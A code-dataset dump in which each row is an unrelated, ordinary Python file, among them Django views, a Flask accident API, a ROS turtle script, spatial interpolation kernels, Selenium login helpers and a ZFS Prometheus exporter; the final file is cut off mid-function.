text stringlengths 8 6.05M |
|---|
from django.shortcuts import render, redirect
from .filters import PupilFilter
from .forms import PupilForm, ClassroomForm, BahoForm
from .models import Classroom, Pupil, Baho
from django.core.paginator import Paginator
from django.views.generic import DetailView, ListView
class PupilListView(ListView):
    """List all pupils, exposing a django-filter ``PupilFilter`` to the template."""
    model = Pupil
    template_name = 'urok/Pupil_list.html'

    def get_context_data(self, **kwargs):
        # Bind the filter to the current GET params so the template can render
        # the filter form next to the (filtered) list.
        ctx = super().get_context_data(**kwargs)
        ctx['filter'] = PupilFilter(self.request.GET, queryset=self.get_queryset())
        return ctx
def index(request):
    """Render the static landing page."""
    return render(request, 'urok/index.html')
def pupil(request):
    """Create a new Pupil from PupilForm; redirect to 'home' on success.

    On an invalid POST the bound form (with errors) is re-rendered.
    """
    form = PupilForm(request.POST) if request.method == "POST" else PupilForm()
    if request.method == "POST" and form.is_valid():
        form.save()
        return redirect('home')
    return render(request, 'urok/pupil.html', {'form': form})
def baho(request):
    """Create a new Baho (grade) via BahoForm; redirect to 'home' on success."""
    form = BahoForm(request.POST) if request.method == "POST" else BahoForm()
    if request.method == "POST" and form.is_valid():
        form.save()
        return redirect('home')
    return render(request, 'urok/baho.html', {'form': form})
def classroom(request):
    """Create a new Classroom via ClassroomForm; redirect to 'home' on success."""
    form = ClassroomForm(request.POST) if request.method == "POST" else ClassroomForm()
    if request.method == "POST" and form.is_valid():
        form.save()
        return redirect('home')
    return render(request, 'urok/classroom.html', {'form': form})
def royxat(request):
    """Render the full pupil roster (context key 'forms' is what the template expects)."""
    pupils = Pupil.objects.all()
    return render(request, 'urok/royxat.html', {'forms': pupils})
def sinflar(request):
    """Render all classrooms; 'links' passes the Pupil model class itself to the template."""
    classrooms = Classroom.objects.all()
    return render(request, 'urok/sinflar.html', {'sinfi': classrooms, 'links': Pupil})
class Oquch(DetailView):
    """Detail page for one pupil with grades in context."""
    model = Pupil
    template_name = 'urok/oquch.html'

    def get_context_data(self, **kwargs):
        ctx = super().get_context_data(**kwargs)
        # NOTE(review): every Baho row is exposed, not just this pupil's —
        # presumably narrowed in the template; confirm.
        ctx['bahos'] = Baho.objects.all()
        return ctx
def category(request, gradue_id):
    """Paginated (10/page) list of the pupils belonging to one classroom."""
    categ = Classroom.objects.get(pk=gradue_id)
    paginator = Paginator(Pupil.objects.filter(gradue=categ), 10)
    topics = paginator.get_page(request.GET.get('page'))
    context = {
        'topics': topics,
        'bahos': Classroom.objects.all(),
        'forms': Baho.objects.all(),
    }
    return render(request, 'urok/category.html', context)
|
from Model.Point import Point
class Segmento:
    """A line segment between two points with optical flags.

    Attributes:
        seccion: the two endpoint Points of the segment.
        especularidad: whether the segment is specular (mirror-like).
        transparencia: whether the segment is transparent.
        lado: free-form side label.
    """

    lado = ""

    def __init__(self, espec=False, puntos=None, trans=False):
        # BUG FIX: the original signature used a mutable default
        # (puntos=[Point(), Point()]), so every instance created without an
        # explicit `puntos` shared the SAME list (and the same Points).
        # Build a fresh pair per instance instead; passing `puntos` behaves
        # exactly as before.
        self.especularidad = espec
        self.seccion = [Point(), Point()] if puntos is None else puntos
        self.transparencia = trans

    def setEspecularidad(self, cambioEspec):
        self.especularidad = cambioEspec

    def getEspecularidad(self):
        return self.especularidad

    def getSeccion(self):
        return self.seccion
|
# import dependencies
from flask import Flask, jsonify, render_template
from accidentsdata import read_accidents, read_accidents_severity,\
read_accidents_severity,read_accidents_state, read_accidents_zipcode,read_accidents_all
app = Flask(__name__)
#Define flask routes
@app.route('/')  # root route (rendered on heroku)
def index():
    """Landing page: static greeting (template rendering currently disabled)."""
    return "<h3>Welcome to Team 8 Project 2 Server!!</h3>"
    # return render_template('index.html')
@app.route('/api/info')  # index of every available API route
def available_apis():
    """Return an HTML list of the routes this server exposes."""
    links = (
        '<h4>Available API Routes:</h4>',
        '<a href="/allaccidents">/allaccidents</a><br/>',
        '<a href="/accidents" target="_blank">/accidents</a><br/>',
        '<a href="/accidents/4" target="_blank">/accidents/min_severity</a><br/>',
        '<a href="/states/TX" target="_blank">/states/state</a><br/>',
        '<a href="/zipcode/77071" target="_blank">/zipcode/zipcode</a><br/>',
    )
    return ''.join(links)
@app.route('/allaccidents')  # heavy: ~540K documents, avoid calling casually
def get_all_ccidents():
    """Return the entire accidents collection as JSON (expensive)."""
    # NOTE(review): function name has a typo ("ccidents"), kept because Flask
    # uses it as the endpoint name — renaming would change url_for() lookups.
    return jsonify(read_accidents_all())
@app.route('/accidents')  # capped result set (see data layer limit)
def get_accidents():
    """Return the capped accidents collection as JSON."""
    return jsonify(read_accidents())
@app.route('/accidents/<min_severity>')  # severity scale 1-4
def get_accidents_severity(min_severity):
    """Return accidents filtered by severity (URL segment arrives as a string)."""
    return jsonify(read_accidents_severity(min_severity))
@app.route('/states/<state>')  # filter to a specific state, e.g. /states/TX
def get_accidents_state(state):
    """Return accidents for one state code."""
    return jsonify(read_accidents_state(state))
@app.route('/zipcode/<zipcode>')  # filter to a specific zipcode, e.g. /zipcode/77071
def get_accidents_zipcode(zipcode):
    """Return accidents for one zipcode."""
    return jsonify(read_accidents_zipcode(zipcode))
if __name__ == '__main__':
    # Run the Flask development server; debug=True enables the reloader and
    # interactive traceback (not for production use).
    app.run(debug=True)
    # print(read_accidents())
    # print(read_accidents_severity(2))
|
from oscpy.server import OSCThreadServer
from time import sleep
def callback(*values):
    """Print every value bundle received on the bound OSC address."""
    print("got values: {}".format(values))
osc = OSCThreadServer()
# Listen on all interfaces, port 8000; default=True makes this socket the
# default target for subsequent bind() calls.
sock = osc.listen(address='0.0.0.0', port=8000, default=True)
osc.bind(b'/send_i', callback)
# Keep the main thread alive while the server thread handles messages.
sleep(1000)
osc.stop()
|
#!/usr/bin/python
#
# Move_Turtle.py
#
# Created on: Nov 9, 2016
# Author: Elad Israel 313448888
#
import sys, rospy
from geometry_msgs.msg import Twist
from turtlesim.msg import Pose
#determines whether location should be displayed or not
shouldDisplay=True
def pose_callback(pose_msg):
    """Log the turtle's current pose once, then disarm.

    The main loop re-arms the module-level ``shouldDisplay`` flag whenever
    the next pose sample should be printed.
    """
    global shouldDisplay
    if shouldDisplay==True:
        rospy.loginfo("x: %.2f, y: %.2f" % (pose_msg.x, pose_msg.y))
        shouldDisplay=False
if __name__ == "__main__":
    FORWARD_SPEED_MPS = 1
    count=1
    # Robot/turtle name comes from the command line (e.g. "turtle1").
    robot_name = sys.argv[1]
    # Initialize the node
    rospy.init_node("move_turtle")
    # A publisher for the movement data
    pub = rospy.Publisher(robot_name+"/cmd_vel", Twist, queue_size=10)
    # A listener for pose
    sub = rospy.Subscriber(robot_name+"/pose", Pose, pose_callback)
    # Drive forward at a given speed. The robot points up the x-axis.
    # The default constructor will set all commands to 0
    msg = Twist()
    msg.linear.x = FORWARD_SPEED_MPS
    # Loop at 10Hz, publishing movement commands until we shut down
    rate = rospy.Rate(10)
    while not rospy.is_shutdown():
        #move forward 14 steps
        if count<15:
            pub.publish(msg)
            rate.sleep()
        # NOTE(review): count == 15 matches neither branch (one silent tick),
        # and the rotate branch fires only on the single tick where count ==
        # 16 — confirm whether `elif count>=16` (keep rotating) was intended.
        #rotate after moving forward
        elif count==16:
            #dont move forward
            msg.linear.x =0
            msg.angular.z= 0.5
            pub.publish(msg)
            rate.sleep()
            #display last location: re-arm the one-shot logger in pose_callback
            shouldDisplay=True
        count+=1
|
# Generated by Django 3.0.8 on 2020-11-28 06:30
from django.db import migrations, models
class Migration(migrations.Migration):
    """Replace FacilitatorQueries.status with a reply field plus timestamps."""
    # NOTE(review): the new field is named 'replay' (default 'Doubt') — likely
    # a typo for 'reply', but it must match the model definition; verify there.

    dependencies = [
        ('facilitators', '0003_auto_20201118_1849'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='facilitatorqueries',
            name='status',
        ),
        migrations.AddField(
            model_name='facilitatorqueries',
            name='added',
            field=models.DateTimeField(auto_now_add=True, null=True),
        ),
        migrations.AddField(
            model_name='facilitatorqueries',
            name='replay',
            field=models.CharField(default='Doubt', max_length=250),
        ),
        migrations.AddField(
            model_name='facilitatorqueries',
            name='updated',
            field=models.DateTimeField(auto_now=True, null=True),
        ),
    ]
|
import shutil
import os
import re
from collections import defaultdict
def read_file_path(folder):
    """Map each subject directory under ``folder`` to its image numbers.

    Returns a dict: subject directory name -> list of file stems (the file
    name with its last extension stripped).
    """
    file_dict = defaultdict(list)
    for subject_name in os.listdir(folder):
        subject_dir = folder + "/" + subject_name + "/"
        for img_name in os.listdir(subject_dir):
            stem = img_name[:img_name.rindex(".")]
            file_dict[subject_name].append(stem)
    return file_dict
if __name__ == "__main__":
    # Image stems per subject for each camera.
    left_dict = read_file_path("/home/machen/dataset/DISFA/Img_LeftCamera")
    right_dict = read_file_path("/home/machen/dataset/DISFA/Img_RightCamera")
    new_dir = "/home/machen/dataset/DISFA/new_of/"
    # Optical-flow folder names look like "<Left|Right>Video<SNxxx>_...".
    pattern = re.compile("(.*?)Video(SN.*?)_.*")
    of_left = defaultdict(list)
    of_right = defaultdict(list)
    for dir_name in os.listdir("/home/machen/dataset/DISFA/optical_flow"):
        seq_ma = pattern.match(dir_name)
        seq_key = seq_ma.group(2)
        left_right = seq_ma.group(1)
        of_dict = of_left
        if left_right == "Right":
            of_dict = of_right
        for of_path in os.listdir("/home/machen/dataset/DISFA/optical_flow/" + dir_name):
            of_no = of_path[:of_path.rindex(".")]
            of_dict[seq_key].append(of_no)
    for img_dict in [left_dict, right_dict]:
        # NOTE(review): this `continue` skips the left camera entirely, so
        # only right-camera files are processed — looks like a temporary
        # debugging guard; confirm before relying on this script.
        if img_dict == left_dict:
            continue
        of_dict = of_left
        if img_dict == right_dict:
            of_dict = of_right
        for seq_key, img_list in img_dict.items():
            of_list = of_dict[seq_key]
            img_list = sorted(img_list, key=lambda e:int(e))
            of_list = sorted(of_list, key=lambda e:int(e))
            # Optical flow normally has one frame fewer than the images;
            # report any sequence where that does not hold.
            if len(img_list) - 1 != len(of_list):
                print(len(img_list) - 1, len(of_list))
            # assert len(left_list) - 1 == len(left_of_list), seq_key
            for idx, img_orig in enumerate(img_list):
                # Clamp trailing images to the final flow frame.
                if idx >= len(of_list):
                    idx = len(of_list) - 1
                src_no = of_list[idx]
                target_keystr = "Img_LeftCamera"
                keystr = "LeftVideo"
                if img_dict == right_dict:
                    keystr = "RightVideo"
                    target_keystr = "Img_RightCamera"
                src_path = "/home/machen/dataset/DISFA/optical_flow/{}".format(keystr) + seq_key+"_comp/" + src_no + ".jpg"
                target_path = new_dir + target_keystr +"/" + seq_key + "/" + img_orig + ".jpg"
                # os.makedirs(os.path.dirname(target_path), exist_ok=True)
                # shutil.copyfile(src_path, target_path)
                # Dry-run only: the actual copy above is commented out.
                print(" move {0} to {1}".format(src_path, target_path))
|
import sys
import re
import logging
def run_calc(calc_str):
    """Evaluate a calculation string supporting '+' and '-' only.

    Spaces are ignored. Returns (result, error_string); the error string is
    currently always '' — unsupported operators ('*', '/') surface as a
    ValueError from float()/precalculate instead.
    """
    res = 0
    err = ''
    print('run_calc: ', calc_str)
    calc_str_clean = calc_str.replace(' ', '')
    add_parts = calc_str_clean.split('+')
    for i in range(len(add_parts)):
        # BUG FIX: the original printed add_parts[1], which raises IndexError
        # whenever the expression contains no '+' (only one part).
        print('add_part: ', add_parts[i])
        if '-' in add_parts[i]:
            # "a-b-c" == a - (b + c): first operand minus the rest.
            subtract_list = add_parts[i].split('-')
            for j in range(len(subtract_list)):
                subtract_list[j] = precalculate(subtract_list[j])
            print(subtract_list)
            add_parts[i] = subtract_list[0] - sum(subtract_list[1:])
            print(add_parts[i])
    print(add_parts)
    res = sum(map(float, add_parts))
    return res, err
def precalculate(part):
    """Convert one operand token to float.

    Placeholder hook where '*' and '/' support would go. Raises ValueError
    for tokens that are not plain numbers.
    """
    # BUG FIX (idiom): the original parameter was named `str`, shadowing the
    # builtin; the function is called positionally, so renaming is safe.
    return float(part)
if __name__ == '__main__':
    # REPL loop: keep asking until run_calc reports an error (empty err
    # string means "continue").
    exit_flag = '1'
    while exit_flag == '1':
        calc_str = input('что посчитать?')
        # Robustness: also reject empty input (calc_str[-1] would raise).
        if not calc_str or calc_str[-1] != '=':
            print('в конце должнен быть знак "="!')
        else:
            # BUG FIX: the original overwrote the user's input here with two
            # hard-coded test expressions (debugging leftovers), so whatever
            # was typed was silently ignored.
            (res, err) = run_calc(calc_str[:-1])
            exit_flag = err
            if not err:
                print('Результат: ', str(res))
            else:
                print('Error: ', err)
|
import numpy as np
import scipy.spatial
def get_spatial_interpolation_kernel(source_location, target_location, method='kriging',
                                     sigma_um=20., p=1, num_closest=3, dtype='float32',
                                     force_extrapolate=False):
    """
    Compute the spatial kernel for linear spatial interpolation.
    This is used for interpolation of bad channels or to correct the drift
    by interpolating between contacts.
    For reference, here is a simple overview on spatial interpolation:
    https://www.aspexit.com/spatial-data-interpolation-tin-idw-kriging-block-kriging-co-kriging-what-are-the-differences/
    Parameters
    ----------
    source_location: array shape (m, 2)
        Positions of the source channels/contacts
    target_location: array shape (n, 2)
        Positions to interpolate onto
    method: 'kriging' or 'idw' or 'nearest'
        Choice of the method
        'kriging' : the same one used in kilosort
        'idw' : inverse distance weighted
        'nearest' : use nearest channel
    sigma_um : float (default 20.)
        Used in the 'kriging' formula
    p: int (default 1)
        Used in the 'kriging' formula
    num_closest: int (default 3)
        Used for 'idw'
    dtype: str (default 'float32')
        dtype of the returned kernel
    force_extrapolate: bool (false by default)
        How to handle when target location are outside source location.
        When False : no extrapolation, all target locations outside are set to zero.
        When True : extrapolation done with the formula of the method.
        In that case the sum of the kernel is not forced to be 1.
    Returns
    -------
    interpolation_kernel: array (m, n)
    """
    # A target is "inside" when each coordinate lies within the source
    # bounding box along every dimension.
    target_is_inside = np.ones(target_location.shape[0], dtype=bool)
    for dim in range(source_location.shape[1]):
        l0, l1 = np.min(source_location[:, dim]), np.max(source_location[:, dim])
        target_is_inside &= (target_location[:, dim] >= l0) & (target_location[:, dim] <= l1)
    if method == 'kriging':
        # this is an adaptation of the pykilosort implementation by Kush Benga
        # https://github.com/int-brain-lab/pykilosort/blob/ibl_prod/pykilosort/datashift2.py#L352
        Kxx = get_kriging_kernel_distance(source_location, source_location, sigma_um, p)
        Kyx = get_kriging_kernel_distance(target_location, source_location, sigma_um, p)
        # Solve the kriging system; 0.01*I is a ridge term for stability.
        interpolation_kernel = Kyx @ np.linalg.pinv(Kxx + 0.01 * np.eye(Kxx.shape[0]))
        interpolation_kernel = interpolation_kernel.T.copy()
        # sparsify: drop negligible weights
        interpolation_kernel[interpolation_kernel < 0.001] = 0.
        # ensure sum = 1 for target inside
        s = np.sum(interpolation_kernel, axis=0)
        interpolation_kernel[:, target_is_inside] /= s[target_is_inside].reshape(1, -1)
    elif method == 'idw':
        distances = scipy.spatial.distance.cdist(source_location, target_location, metric='euclidean')
        interpolation_kernel = np.zeros((source_location.shape[0], target_location.shape[0]), dtype='float64')
        for c in range(target_location.shape[0]):
            # Weight the num_closest sources by inverse distance.
            ind_sorted = np.argsort(distances[:, c])
            chan_closest = ind_sorted[:num_closest]
            dists = distances[chan_closest, c]
            if dists[0] == 0.:
                # no interpolation the first have zeros distance
                interpolation_kernel[chan_closest[0], c] = 1.
            else:
                interpolation_kernel[chan_closest, c] = 1 / dists
        # ensure sum = 1 for target inside
        s = np.sum(interpolation_kernel, axis=0)
        interpolation_kernel[:, target_is_inside] /= s[target_is_inside].reshape(1, -1)
    elif method == 'nearest':
        distances = scipy.spatial.distance.cdist(source_location, target_location, metric='euclidean')
        interpolation_kernel = np.zeros((source_location.shape[0], target_location.shape[0]), dtype='float64')
        for c in range(target_location.shape[0]):
            ind_closest = np.argmin(distances[:, c])
            interpolation_kernel[ind_closest, c] = 1.
    else:
        raise ValueError('get_interpolation_kernel wrong method')
    if not force_extrapolate:
        # Zero out targets outside the source bounding box (no extrapolation).
        interpolation_kernel[:, ~target_is_inside] = 0
    return interpolation_kernel.astype(dtype)
def get_kriging_kernel_distance(locations_1, locations_2, sigma_um, p):
    """Gaussian-kernel similarity between two sets of locations.

    Parameters
    ----------
    locations_1 / locations_2 : 2D np.array
        Locations of shape (N, D) where N is the number of channels and D is
        the spatial dimension (e.g. 2 for [x, y]).
    sigma_um : float
        Scale parameter on the Gaussian kernel, typically the distance
        between contacts in micrometers.
    p : float
        Weight parameter on the exponential function. Default in IBL kriging
        interpolation is 1.3.
    Returns
    -------
    kernal_dist : (N1, N2) array of exp(-(d/sigma_um)**p) values between
        locations 1 and 2 (1 at distance 0, decaying with distance).
    """
    pairwise = scipy.spatial.distance.cdist(locations_1, locations_2, metric='euclidean')
    return np.exp(-((pairwise / sigma_um) ** p))
def get_kriging_channel_weights(contact_positions1, contact_positions2, sigma_um, p,
                                weight_threshold=0.005):
    """
    Calculate weights for kriging interpolation. Weights below weight_threshold are set to 0.
    Based on the interpolate_bad_channels() function of the International Brain Laboratory.
    International Brain Laboratory et al. (2022). Spike sorting pipeline for the
    International Brain Laboratory. https://www.internationalbrainlab.com/repro-ephys
    """
    weights = get_kriging_kernel_distance(contact_positions1, contact_positions2, sigma_um, p)
    weights[weights < weight_threshold] = 0
    # Normalise each column to sum to 1; all-zero columns produce NaN/inf
    # here, which the final thresholding pass zeroes out again.
    with np.errstate(divide='ignore', invalid='ignore'):
        weights /= np.sum(weights, axis=0)[None, :]
    weights[np.logical_or(weights < weight_threshold, np.isnan(weights))] = 0
    return weights
|
from jaeger_client import Config
from opentracing.scope_managers.asyncio import AsyncioScopeManager
def initialize_tracing_client(
    service_name,
    reporting_host='localhost',
    reporting_port='6831'
):
    """Create and initialize a Jaeger tracer for ``service_name``.

    Uses constant sampling (param=1: sample every span), reports spans to the
    given agent host/port, and installs the asyncio scope manager so the
    tracer is usable from coroutines.
    """
    tracer_config = Config(
        service_name=service_name,
        validate=True,
        scope_manager=AsyncioScopeManager(),
        config={
            'sampler': {'type': 'const', 'param': 1},
            'local_agent': {
                'reporting_host': reporting_host,
                'reporting_port': reporting_port,
            },
        },
    )
    return tracer_config.initialize_tracer()
|
from selenium import webdriver
import unittest
from time import sleep,ctime
def login_regular(driver, phone="18583965785"):
    """Log in through the SMS-code flow, reading the code back off the page.

    Assumes the popup outside the frame exposes the sent code in the
    xpath'd <p> element (test-environment behaviour).
    """
    driver.find_element_by_id("loginBtn-text").click()
    driver.switch_to.frame("indexFrame")
    driver.find_element_by_id("js-phone-num").clear()
    driver.find_element_by_id("js-code-val").clear()
    driver.find_element_by_id("js-phone-num").send_keys(phone)
    driver.find_element_by_id("js-get-code").click()
    sleep(1)
    driver.switch_to.default_content()
    text = driver.find_element_by_xpath("/html/body/div[3]/div/div/div[3]/p").text
    # BUG FIX: switch_to_frame() was deprecated and removed in Selenium 4;
    # use the switch_to.frame() API already used above for consistency.
    driver.switch_to.frame("indexFrame")
    driver.find_element_by_id("js-code-val").send_keys(text)
    driver.find_element_by_id("js-login-event").click()
    sleep(10)
def login_test(driver, phone="12055116631"):
    """Log in with a test account whose SMS code is auto-filled server-side."""
    driver.find_element_by_id("loginBtn-text").click()
    driver.switch_to.frame("indexFrame")
    # Clear both inputs before typing the phone number.
    driver.find_element_by_id("js-phone-num").clear()
    driver.find_element_by_id("js-code-val").clear()
    driver.find_element_by_id("js-phone-num").send_keys(phone)
    driver.find_element_by_id("js-get-code").click()
    sleep(1)
    driver.find_element_by_id("js-login-event").click()
    sleep(10)
#! /user/bin/env python
# _*_ coding: utf-8 _*_
# __author__ = "王顶"
# Email: 408542507@qq.com
"""
循环切片实现
需求总是改变,一会是4层金字塔,一会儿是5层金子塔
到底要几层,改一下 while 循环的条件变量就行了
"""
level = 0
line = ''
stars = '*******************************************'
# NOTE(review): 'spaces' must contain at least 4 spaces for the indent slice
# below to work — verify the literal was not truncated in transit.
spaces = ' '
while level < 4:  # 4 rows; change this bound to resize the pyramid
    n = level * 2 + 1  # n: number of '*' on this row
    m = 4 - level  # m: number of leading spaces on this row
    line = spaces[:m] + stars[:n]
    print(line)
    level = level + 1
from dataclasses import dataclass
from typing import Union
from rdflib import OWL, Graph
from rdflib.term import Node, BNode
from funowl.base.cast_function import exclude
from funowl.base.fun_owl_choice import FunOwlChoice
from funowl.identifiers import IRI
from funowl.writers import FunctionalWriter
@dataclass
class ObjectProperty(IRI):
    """An OWL object property identified by its IRI; typed owl:ObjectProperty in RDF."""
    rdf_type = OWL.ObjectProperty
@dataclass
class ObjectInverseOf(FunOwlChoice):
    """The OWL ObjectInverseOf(OPE) construct: the inverse of an object property."""
    # str is excluded from the choice so raw strings coerce into ObjectProperty.
    v: Union[ObjectProperty, str] = exclude([str])

    def to_functional(self, w: FunctionalWriter) -> FunctionalWriter:
        # Emits: ObjectInverseOf( <v> )
        return w.func(self, lambda: w + self.v)

    def to_rdf(self, g: Graph, emit_type_arc: bool = False) -> Node:
        # RDF mapping: a blank node carrying owl:inverseOf to the property.
        x = BNode()
        assert isinstance(self.v, ObjectProperty)
        g.add((x, OWL.inverseOf, self.v.to_rdf(g)))
        return x
@dataclass
class ObjectPropertyExpression(FunOwlChoice):
    """Either a named ObjectProperty or an ObjectInverseOf expression."""
    # The order below is important — NOTE(review): presumably FunOwlChoice
    # tries the Union alternatives left to right when coercing; confirm.
    v: Union[ObjectProperty, ObjectInverseOf, str] = exclude([str])
|
# Variable naming demo: names are case-sensitive, may contain letters,
# digits and '_', and must not start with a digit.
a=1
A=2
A1=3
#2b=4
print(a, A, A1)
'''
변수명 정하기
1) 영문과 숫자, _로 이루어진다.
2) 대소문자를 구분한다.
3) 문자나, _ 로 시작한다.
4) 특수문자를 사용하면 안된다.
'''
# Multiple assignment
a,b,c = 3,2,1
print(a,b,c)
# Value swap — a very common Python idiom
a,b = 10, 20
print(a,b)
a,b = b,a
print(a,b)
# Variable types: ints have arbitrary precision
a = 123456782569871598715
print(a)
a=12.123456789123456789
print(a) # floats are 8-byte doubles, so only ~17 significant digits print
a = "student"
print(a)
# Output styles: sep/end keyword arguments of print()
print("number")
a,b,c = 1,2,3
print(a,b,c)
print("number : ", a,b,c)
print(a,b,c, sep=',')
print(a,b,c, sep='')
print(a,b,c, sep='\n')
print(a, end = ' ')
print(b, end = ' ')
print(c)
|
#!/usr/bin/python3
from typing import List, Tuple
from enum import Enum, auto
import argparse
from zpool_parser import get_zpool_status, ZPoolState, DriveStatus, SubpoolType, SubpoolStatus, ZPoolStatus
def export_zfs_text(pool_data: List[ZPoolStatus]):
    """Concatenate every metric section into one Prometheus text payload."""
    sections = (
        export_zfs_pool_health,
        export_zfs_drive_health,
        export_zfs_resilver_status,
        export_zfs_resilver_time,
        export_zfs_resilver_last_time,
        export_zfs_scrub_status,
        export_zfs_scrub_time,
        export_zfs_scrub_last_time,
    )
    return ''.join(section(pool_data) for section in sections)
def export_zfs_pool_health(pool_data: List[ZPoolStatus]) -> str:
    """Render ZFS_Pool_Health gauge lines (0=healthy, 1=degraded)."""
    lines = ["# HELP ZFS_Pool_Health: 0=healthy, 1=degraded",
             "# TYPE ZFS_Pool_Health gauge"]
    for pool in pool_data:
        lines.append(f'ZFS_Pool_Health{{pool="{pool.name}"}} {pool.state.value}')
    # Trailing blank line separates sections in the combined export.
    return "\n".join(lines) + "\n\n"
def export_zfs_drive_health(pool_data: List[ZPoolStatus]) -> str:
    """Render ZFS_Drive_Health gauge lines per drive (0=healthy, 1=degraded, 2=unavail)."""
    lines = ["# HELP ZFS_Drive_Health: 0=healthy, 1=degraded, 2=unavail",
             "# TYPE ZFS_Drive_Health gauge"]
    for pool in pool_data:
        for subpool in pool.subpools:
            for drive in subpool.drives:
                lines.append(
                    f'ZFS_Drive_Health{{pool="{pool.name}", name="{drive.name}"}} {drive.state.value}')
    return "\n".join(lines) + "\n\n"
def export_zfs_resilver_status(pool_data: List[ZPoolStatus]) -> str:
    """Render ZFS_Resilver_Status gauge lines (0=idle, 1=resilvering)."""
    lines = ["# HELP ZFS_Resilver_Status: 0=not resilvering, 1=resilvering",
             "# TYPE ZFS_Resilver_Status gauge"]
    for pool in pool_data:
        flag = 1 if pool.currently_resilvering else 0
        lines.append(f'ZFS_Resilver_Status{{pool="{pool.name}"}} {flag}')
    return "\n".join(lines) + "\n\n"
def export_zfs_resilver_time(pool_data: List[ZPoolStatus]) -> str:
    """Render ZFS_Resilver_Time_Remaining gauge lines (seconds)."""
    lines = ["# HELP ZFS_Resilver_Time_Remaining: time in seconds",
             "# TYPE ZFS_Resilver_Time_Remaining gauge"]
    for pool in pool_data:
        lines.append(
            f'ZFS_Resilver_Time_Remaining{{pool="{pool.name}"}} {pool.resilver_time_remaining}')
    return "\n".join(lines) + "\n\n"
def export_zfs_resilver_last_time(pool_data: List[ZPoolStatus]) -> str:
    """Render ZFS_Resilver_Last_Time gauge lines (seconds since epoch)."""
    lines = ["# HELP ZFS_Resilver_Last_Time: time since epoch",
             "# TYPE ZFS_Resilver_Last_Time gauge"]
    for pool in pool_data:
        lines.append(f'ZFS_Resilver_Last_Time{{pool="{pool.name}"}} {pool.last_resilver}')
    return "\n".join(lines) + "\n\n"
def export_zfs_scrub_status(pool_data: List[ZPoolStatus]) -> str:
    """Render ZFS_Scrub_Status gauge lines (0=idle, 1=scrubbing)."""
    lines = ["# HELP ZFS_Scrub_Status: 0=not scrubbing, 1=scrubbing",
             "# TYPE ZFS_Scrub_Status gauge"]
    for pool in pool_data:
        flag = 1 if pool.currently_scrubbing else 0
        lines.append(f'ZFS_Scrub_Status{{pool="{pool.name}"}} {flag}')
    return "\n".join(lines) + "\n\n"
def export_zfs_scrub_time(pool_data: List[ZPoolStatus]) -> str:
    """Render ZFS_Scrub_Time_Remaining gauge lines (seconds)."""
    lines = ["# HELP ZFS_Scrub_Time_Remaining: time in seconds",
             "# TYPE ZFS_Scrub_Time_Remaining gauge"]
    for pool in pool_data:
        lines.append(
            f'ZFS_Scrub_Time_Remaining{{pool="{pool.name}"}} {pool.scrub_time_remaining}')
    return "\n".join(lines) + "\n\n"
def export_zfs_scrub_last_time(pool_data: List[ZPoolStatus]) -> str:
    """Render ZFS_Scrub_Last_Time gauge lines (seconds since epoch)."""
    lines = ["# HELP ZFS_Scrub_Last_Time: time since epoch",
             "# TYPE ZFS_Scrub_Last_Time gauge"]
    for pool in pool_data:
        lines.append(f'ZFS_Scrub_Last_Time{{pool="{pool.name}"}} {pool.last_scrub}')
    return "\n".join(lines) + "\n\n"
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Generate Prometheus formatted list.")
    parser.add_argument("-o", "--output-file", type=str, help="path + filename to output to")
    args = parser.parse_args()
    # Build the full report once, then write to file or stdout.
    report = export_zfs_text(get_zpool_status())
    if args.output_file:
        with open(args.output_file, "w") as f:
            f.write(report)
    else:
        print(report)
|
from .utils import sendMail
# Mail templates keyed by mail type; the {placeholders} are filled via
# str.format using title_kwargs/body_kwargs in the senders below.
MAIL_DEFAULTS = {
    "SHARED_WITH_ME": {
        "title": "{sender_name} has shared {resource_name} with you",
        "body": "Hi {recepient_name},\n Kindly use this link below to access {resource_url}"
    }
}
def send_mail(type, user_list, title_kwargs, body_kwargs):
    """Send a templated mail of ``type`` to every user in ``user_list``.

    The title is shared across recipients; the body gets each recipient's
    first name injected as ``recepient_name``.
    """
    # The title does not depend on the recipient, so format it once.
    title = MAIL_DEFAULTS[type]["title"].format(**title_kwargs)
    for user in user_list:
        per_user_kwargs = dict(body_kwargs, recepient_name=user["first_name"])
        body = MAIL_DEFAULTS[type]["body"].format(**per_user_kwargs)
        sendMail(title, body, [user["email"]])
def sync_send_mail(type, user_list, title_kwargs, body_kwargs):
    """Synchronous variant of send_mail (same behaviour).

    CONSISTENCY FIX: the body was a byte-for-byte duplicate of send_mail;
    delegate to it so template handling cannot drift between the two paths.
    """
    send_mail(type, user_list, title_kwargs, body_kwargs)
|
from rest_framework import permissions, viewsets
from rest_framework.decorators import api_view, permission_classes, authentication_classes
from rest_framework.views import APIView
from rest_framework.permissions import AllowAny
from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponse
from rest_framework.decorators import api_view
from rest_framework.response import Response
from .serializers import QuestionaireSerializer, QuestionaireStatusSerializer, QuestionTypeSerializer, QuestionSerializer, ResponseSerializer
from .models import Questionaire, QuestionaireStatus, QuestionType, Question, RadioChoice, Response as Res, ResponseItem
from django.contrib.auth.models import User
from rest_framework.status import (
HTTP_400_BAD_REQUEST,
HTTP_404_NOT_FOUND,
HTTP_200_OK
)
import json
# Create your views here.
def index(request):
    """Plain-text landing page for the questionaire app."""
    return HttpResponse("Create a questionaire here")
@permission_classes([permissions.IsAuthenticatedOrReadOnly,])
class questionaireViewset(viewsets.ModelViewSet):
    """CRUD over questionaires: owners see their own, anonymous see status 2 only."""
    queryset = Questionaire.objects.all()
    serializer_class = QuestionaireSerializer

    def get_queryset(self):
        if self.request.user.is_authenticated:
            return self.queryset.filter(user=self.request.user)
        # Anonymous callers only get questionaires with status_id=2 —
        # presumably "published"; confirm against QuestionaireStatus rows.
        return self.queryset.filter(status_id=2)
class questionaireStatusViewSet(viewsets.ReadOnlyModelViewSet):
    """Read-only list/detail of the available questionaire statuses."""
    queryset = QuestionaireStatus.objects.all()
    serializer_class = QuestionaireStatusSerializer
class questionTypeViewSet(viewsets.ReadOnlyModelViewSet):
    """Read-only list/detail of the available question types."""
    queryset = QuestionType.objects.all()
    serializer_class = QuestionTypeSerializer
@permission_classes([permissions.IsAuthenticatedOrReadOnly,])
class questionViewSet(viewsets.ReadOnlyModelViewSet):
    """Read-only questions, optionally filtered with ?questionaireId=<id>."""
    queryset = Question.objects.all()
    serializer_class = QuestionSerializer

    def get_queryset(self):
        questionaire_id = self.request.query_params.get('questionaireId', None)
        if not questionaire_id:
